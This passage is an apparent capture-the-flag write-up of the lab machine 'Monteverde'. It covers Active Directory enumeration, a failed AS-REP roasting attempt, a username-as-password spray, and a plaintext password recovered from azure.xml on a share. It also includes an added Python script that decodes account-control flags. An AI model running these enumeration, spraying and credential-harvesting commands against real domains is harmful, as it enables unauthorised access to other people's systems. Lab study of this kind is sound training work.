Information Security
Monteverde
1. Nmap
$ nmap -p- --open --max-retries 2 -Pn -n 10.129.228.111 -oA fullscan
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 16:10 KST
Nmap scan report for 10.129.228.111
Host is up (0.085s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49676/tcp open unknown
49693/tcp open unknown
60578/tcp open unknown
$ nmap -sV -sC -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49676,49693,60578 -min-rate 5000 -oA alltcp -Pn 10.129.228.111
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-17 07:21:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
60578/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-09-17T07:21:58
|_ start_date: N/A
|_clock-skew: -10s
$ nmap --script vuln -oA script 10.129.228.111 -Pn -n
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 16:10 KST
Nmap scan report for 10.129.228.111
Host is up (0.088s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
$ sudo nmap -sU -oA alludp 10.129.228.111 -p- --min-rate 5000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 16:22 KST
Nmap scan report for 10.129.228.111
Host is up (0.092s latency).
Not shown: 65532 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
SMB Enum
$ crackmapexec smb 10.129.228.111 -u '' -p '' --shares
SMB 10.129.228.111 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.129.228.111 445 MONTEVERDE [+] MEGABANK.LOCAL\:
SMB 10.129.228.111 445 MONTEVERDE [-] Error enumerating shares: STATUS_ACCESS_DENIED
enum4linux
$ enum4linux -a 10.129.228.111
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Sep 17 16:28:16 2023
=========================================( Target Information )=========================================
Target ........... 10.129.228.111
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 10.129.228.111 )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for 10.129.228.111 )===============================
Looking up status of 10.129.228.111
No reply from 10.129.228.111
==================================( Session Check on 10.129.228.111 )==================================
[+] Server 10.129.228.111 allows sessions using username '', password ''
===============================( Getting domain SID for 10.129.228.111 )===============================
Domain Name: MEGABANK
Domain Sid: S-1-5-21-391775091-850290835-3566037492
[+] Host is part of a domain (not a workgroup)
==================================( OS information on 10.129.228.111 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.129.228.111 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
======================================( Users on 10.129.228.111 )======================================
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2 Name: AAD_987d7f2f57d2 Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos Name: Dimitris Galanos Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope Name: Mike Hope Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary Name: Ray O'Leary Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs Name: SABatchJobs Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan Name: Sally Morgan Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata Name: svc-ata Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec Name: svc-bexec Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp Name: svc-netapp Desc: (null)
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
================================( Share Enumeration on 10.129.228.111 )================================
do_connect: Connection to 10.129.228.111 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.129.228.111
===========================( Password Policy Information for 10.129.228.111 )===========================
[+] Attaching to 10.129.228.111 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.129.228.111)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] MEGABANK
[+] Builtin
[+] Password Info for Domain: MEGABANK
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
======================================( Groups on 10.129.228.111 )======================================
[+] Getting builtin groups:
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]
[+] Getting builtin group memberships:
Group: IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs
Group: Users' (RID: 545) has member: Couldn't lookup SIDs
Group: Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs
Group: Guests' (RID: 546) has member: Couldn't lookup SIDs
Group: Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
group:[SQLServer2005SQLBrowserUser$MONTEVERDE] rid:[0x44f]
group:[ADSyncAdmins] rid:[0x451]
group:[ADSyncOperators] rid:[0x452]
group:[ADSyncBrowse] rid:[0x453]
group:[ADSyncPasswordSet] rid:[0x454]
[+] Getting local group memberships:
Group: ADSyncAdmins' (RID: 1105) has member: Couldn't lookup SIDs
Group: Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
group:[Developers] rid:[0xa34]
[+] Getting domain group memberships:
Group: 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator
Group: 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2
Group: 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope
Group: 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
Group: 'Trading' (RID: 2610) has member: MEGABANK\dgalanos
Group: 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary
Group: 'Operations' (RID: 2609) has member: MEGABANK\smorgan
Group: 'Domain Guests' (RID: 514) has member: MEGABANK\Guest
Group: 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group: 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group: 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2
Group: 'Domain Users' (RID: 513) has member: MEGABANK\mhope
Group: 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs
Group: 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata
Group: 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec
Group: 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp
Group: 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos
Group: 'Domain Users' (RID: 513) has member: MEGABANK\roleary
Group: 'Domain Users' (RID: 513) has member: MEGABANK\smorgan
LDAP
$ crackmapexec ldap 10.129.228.111 -u '' -p '' --users | tee test.txt
SMB 10.129.228.111 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
LDAP 10.129.228.111 389 MONTEVERDE [+] MEGABANK.LOCAL\:
LDAP 10.129.228.111 389 MONTEVERDE [*] Total of records returned 13
LDAP 10.129.228.111 389 MONTEVERDE Guest Built-in account for guest access to the computer/domain
LDAP 10.129.228.111 389 MONTEVERDE AAD_987d7f2f57d2 Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
LDAP 10.129.228.111 389 MONTEVERDE mhope
LDAP 10.129.228.111 389 MONTEVERDE SABatchJobs
LDAP 10.129.228.111 389 MONTEVERDE svc-ata
LDAP 10.129.228.111 389 MONTEVERDE svc-bexec
LDAP 10.129.228.111 389 MONTEVERDE svc-netapp
LDAP 10.129.228.111 389 MONTEVERDE dgalanos
LDAP 10.129.228.111 389 MONTEVERDE roleary
LDAP 10.129.228.111 389 MONTEVERDE smorgan
$ cat test.txt | tr -s ' ' | cut -d ' ' -f 5
[*]
[+]
[*]
Guest
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan
Save the retrieved usernames to 'users.txt'.
$ vim users.txt
:set paste
$ cat users.txt
Guest
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan
Three attack approaches when only usernames are known
- password spraying
- AS-REPRoasting
- password bruteforce
1. AS-REP Roasting attack
AS-REP roasting looks for accounts, usually administrator or service accounts, that have Kerberos pre-authentication disabled and recovers a password hash from them; it relies on extracting the password hash of a user account that requests a TGS (Ticket-Granting Service) without going through pre-authentication.
The hash can then be cracked with a separate hash-cracking tool or rainbow tables to recover the password, or the hash itself can be released.
AS-REP roasting is carried out with the impacket-GetNPUsers (Non-Pre-Authenticated Users) script.
impacket-GetNPUsers is the script used to perform AS-REP roasting against a given domain.
impacket-GetNPUsers usage:
impacket-GetNPUsers [domain]/'' -usersfile [username file] -outputfile [output file] -dc-ip [target IP]
htb.local/'' : specifies the target domain. The domain is htb.local and the target user is the empty string, meaning every user account is targeted.
-usersfile users.txt : the file containing the list of target usernames. Normally this is the path to a text file listing the user accounts to test for AS-REP roasting.
-outputfile asreproast.hash : the file the retrieved AS-REP roast hashes are written to; here, the path of the file the hashes should be saved in.
When the command runs, the output looks as though it failed, but ls shows that the file was created normally. The real result has to be checked by looking at the file contents.
$ impacket-GetNPUsers MEGABANK.LOCAL/'' -usersfile users.txt -outputfile asreproast.hash -dc-ip 10.129.228.111
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User AAD_987d7f2f57d2 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mhope doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User SABatchJobs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-ata doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-bexec doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-netapp doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User dgalanos doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User roleary doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User smorgan doesn't have UF_DONT_REQUIRE_PREAUTH set
$ cat asreproast1.hash
The file is empty; the attack failed.
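The acb values in the enum4linux user listing above are SAMR account-control flags, and they already show why GetNPUsers came back empty: no account has the DONT_REQUIRE_PREAUTH bit (0x10000) set, and the one disabled account (Guest) is what produces the KDC_ERR_CLIENT_REVOKED line. The following decoder is an added example, not part of the original post; its sample input reproduces four lines from the listing plus one constructed line (svc-legacy) to show what a roastable account looks like.

```python
import re

# SAMR user account-control (ACB_*) flags, i.e. the "acb:" field that
# enum4linux prints for each user (bit values from MS-SAMR USER_ACCOUNT flags).
ACB_FLAGS = {
    0x00000001: "DISABLED",
    0x00000002: "HOMDIRREQ",
    0x00000004: "PWNOTREQ",
    0x00000008: "TEMPDUP",
    0x00000010: "NORMAL",
    0x00000020: "MNS",
    0x00000040: "DOMTRUST",
    0x00000080: "WSTRUST",
    0x00000100: "SVRTRUST",
    0x00000200: "PWNOEXP",
    0x00000400: "AUTOLOCK",
    0x00000800: "ENC_TXT_PWD_ALLOWED",
    0x00001000: "SMARTCARD_REQUIRED",
    0x00002000: "TRUSTED_FOR_DELEGATION",
    0x00004000: "NOT_DELEGATED",
    0x00008000: "USE_DES_KEY_ONLY",
    0x00010000: "DONT_REQUIRE_PREAUTH",
    0x00020000: "PW_EXPIRED",
}

# Matches the RID / acb / Account fields of one enum4linux user line.
USER_LINE = re.compile(
    r"RID:\s*(0x[0-9a-fA-F]+)\s+acb:\s*(0x[0-9a-fA-F]+)\s+Account:\s*(\S+)"
)

# Constructed sample: the first four lines reproduce the enum4linux output
# above; the svc-legacy line is made up (acb with bit 0x10000 set).
SAMPLE_OUTPUT = """\
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2 Name: AAD_987d7f2f57d2 Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope Name: Mike Hope Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs Name: SABatchJobs Desc: (null)
index: 0xfff RID: 0xa99 acb: 0x00010210 Account: svc-legacy Name: svc-legacy Desc: (null)
"""


def decode_acb(acb):
    """Return the names of the ACB_* flags set in an acb value, lowest bit first."""
    return [name for bit, name in sorted(ACB_FLAGS.items()) if acb & bit]


def audit_users(enum4linux_output):
    """Parse enum4linux user lines and evaluate each account's control flags.

    An account is AS-REP roastable only when DONT_REQUIRE_PREAUTH is set and
    the account is enabled; for a disabled account the KDC answers
    KDC_ERR_CLIENT_REVOKED instead, which is what the Guest account produced.
    """
    results = []
    for line in enum4linux_output.splitlines():
        m = USER_LINE.search(line)
        if not m:
            continue
        acb = int(m.group(2), 16)
        flags = decode_acb(acb)
        results.append({
            "account": m.group(3),
            "rid": int(m.group(1), 16),
            "acb": acb,
            "flags": flags,
            "disabled": "DISABLED" in flags,
            "asrep_roastable": "DONT_REQUIRE_PREAUTH" in flags and "DISABLED" not in flags,
            "password_not_required": "PWNOTREQ" in flags,
            "password_never_expires": "PWNOEXP" in flags,
        })
    return results


def roastable_accounts(results):
    """Names of enabled accounts that do not require Kerberos pre-authentication."""
    return [r["account"] for r in results if r["asrep_roastable"]]


if __name__ == "__main__":
    audited = audit_users(SAMPLE_OUTPUT)
    for r in audited:
        print(f"{r['account']:<18} acb=0x{r['acb']:08x} {' | '.join(r['flags'])}")
    print("AS-REP roastable:", roastable_accounts(audited))
```

Running the same decoder over the full listing from the target shows every real account at 0x210 (NORMAL | PWNOEXP), so the empty hash file is the expected outcome rather than a tooling problem.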
2. Password brute force
Check whether any user has a password identical to their username.
$ crackmapexec smb target_ip -u users.txt -p users.txt --continue-on-success
SMB 10.129.228.111 445 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:mhope STATUS_LOGON_FAILURE
SMB 10.129.228.111 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
SABatchJobs:SABatchJobs was found.
With a valid user ID/password in hand, check which shares that user can access.
$ smbmap -H 10.129.228.111 -d MEGABANK.LOCAL -u SABatchJobs -p SABatchJobs
[+] IP: 10.129.228.111:445 Name: 10.129.228.111
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
azure_uploads READ ONLY
C$ NO ACCESS Default share
E$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
users$ READ ONLY
Connect to the users$ share and pull down the azure.xml file.
$ smbclient //10.129.228.111/users$ -U MEGABANK.LOCAL\\SABatchJobs%SABatchJobs
smb: \> ls
. D 0 Fri Jan 3 22:12:48 2020
.. D 0 Fri Jan 3 22:12:48 2020
dgalanos D 0 Fri Jan 3 22:12:30 2020
mhope D 0 Fri Jan 3 22:41:18 2020
roleary D 0 Fri Jan 3 22:10:30 2020
smorgan D 0 Fri Jan 3 22:10:24 2020
smb: \mhope\> ls
. D 0 Fri Jan 3 22:41:18 2020
.. D 0 Fri Jan 3 22:41:18 2020
azure.xml AR 1212 Fri Jan 3 22:40:23 2020
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (2.2 KiloBytes/sec) (average 2.2 KiloBytes/sec)
Inspecting azure.xml reveals a password.
$ cat azure.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>
So can this be taken as mhope's password??
The command below works, so this is indeed mhope's password.
$ smbmap -H 10.129.228.111 -d MEGABANK.LOCAL -u mhope -p 4n0therD4y@n0th3r$ -R
[+] IP: 10.129.228.111:445 Name: 10.129.228.111
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
azure_uploads READ ONLY
.\azure_uploads\*
dr--r--r-- 0 Fri Jan 3 21:43:36 2020 .
dr--r--r-- 0 Fri Jan 3 21:43:36 2020 ..
C$ NO ACCESS Default share
E$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
.\IPC$\*
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 InitShutdown
fr--r--r-- 4 Mon Jan 1 08:27:52 1601 lsass
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 ntsvcs
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 scerpc
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 Winsock2\CatalogChangeListener-374-0
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 epmapper
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 Winsock2\CatalogChangeListener-1d4-0
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 LSM_API_service
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 eventlog
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 Winsock2\CatalogChangeListener-468-0
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 atsvc
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 Winsock2\CatalogChangeListener-5f4-0
fr--r--r-- 4 Mon Jan 1 08:27:52 1601 wkssvc
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 Winsock2\CatalogChangeListener-26c-0
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 Winsock2\CatalogChangeListener-26c-1
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 RpcProxy\49673
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 aca786102a7d4e91
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 RpcProxy\593
fr--r--r-- 5 Mon Jan 1 08:27:52 1601 srvsvc
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 spoolss
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 Winsock2\CatalogChangeListener-8a4-0
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 netdfs
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 vgauth-service
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 ROUTER
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 Winsock2\CatalogChangeListener-25c-0
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 SQLLocal\MSSQLSERVER
fr--r--r-- 2 Mon Jan 1 08:27:52 1601 sql\query
fr--r--r-- 3 Mon Jan 1 08:27:52 1601 W32TIME_ALT
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 Winsock2\CatalogChangeListener-aa8-0
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 CPFATP_2712_v4.0.30319
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 PSHost.133394071083938761.2712.DefaultAppDomain.miiserver
fr--r--r-- 1 Mon Jan 1 08:27:52 1601 Winsock2\CatalogChangeListener-ab0-0
NETLOGON READ ONLY Logon server share
.\NETLOGON\*
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 .
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 ..
SYSVOL READ ONLY Logon server share
.\SYSVOL\*
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 .
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 ..
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 MEGABANK.LOCAL
.\SYSVOL\MEGABANK.LOCAL\*
dr--r--r-- 0 Fri Jan 3 07:11:34 2020 .
dr--r--r-- 0 Fri Jan 3 07:11:34 2020 ..
dr--r--r-- 0 Sun Sep 17 15:54:42 2023 DfsrPrivate
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 Policies
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 scripts
.\SYSVOL\MEGABANK.LOCAL\Policies\*
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 .
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 ..
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 {31B2F340-016D-11D2-945F-00C04FB984F9}
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 {6AC1786C-016F-11D2-945F-00C04fB984F9}
.\SYSVOL\MEGABANK.LOCAL\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\*
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 .
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 ..
fr--r--r-- 22 Fri Jan 3 21:47:23 2020 GPT.INI
dr--r--r-- 0 Fri Jan 3 21:47:06 2020 MACHINE
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 USER
.\SYSVOL\MEGABANK.LOCAL\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\*
dr--r--r-- 0 Fri Jan 3 21:47:06 2020 .
dr--r--r-- 0 Fri Jan 3 21:47:06 2020 ..
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 Microsoft
fr--r--r-- 2792 Fri Jan 3 07:17:56 2020 Registry.pol
dr--r--r-- 0 Fri Jan 3 21:47:06 2020 Scripts
.\SYSVOL\MEGABANK.LOCAL\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\*
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 .
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 ..
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 Windows NT
.\SYSVOL\MEGABANK.LOCAL\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Scripts\*
dr--r--r-- 0 Fri Jan 3 21:47:06 2020 .
dr--r--r-- 0 Fri Jan 3 21:47:06 2020 ..
dr--r--r-- 0 Fri Jan 3 21:47:06 2020 Shutdown
dr--r--r-- 0 Fri Jan 3 21:47:06 2020 Startup
.\SYSVOL\MEGABANK.LOCAL\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\*
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 .
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 ..
fr--r--r-- 22 Fri Jan 3 07:26:34 2020 GPT.INI
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 MACHINE
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 USER
.\SYSVOL\MEGABANK.LOCAL\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\*
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 .
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 ..
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 Microsoft
.\SYSVOL\MEGABANK.LOCAL\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\*
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 .
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 ..
dr--r--r-- 0 Fri Jan 3 07:05:27 2020 Windows NT
users$ READ ONLY
.\users$\*
dr--r--r-- 0 Fri Jan 3 22:12:48 2020 .
dr--r--r-- 0 Fri Jan 3 22:12:48 2020 ..
dr--r--r-- 0 Fri Jan 3 22:15:23 2020 dgalanos
dr--r--r-- 0 Fri Jan 3 22:41:18 2020 mhope
dr--r--r-- 0 Fri Jan 3 22:14:56 2020 roleary
dr--r--r-- 0 Fri Jan 3 22:14:28 2020 smorgan
.\users$\mhope\*
dr--r--r-- 0 Fri Jan 3 22:41:18 2020 .
dr--r--r-- 0 Fri Jan 3 22:41:18 2020 ..
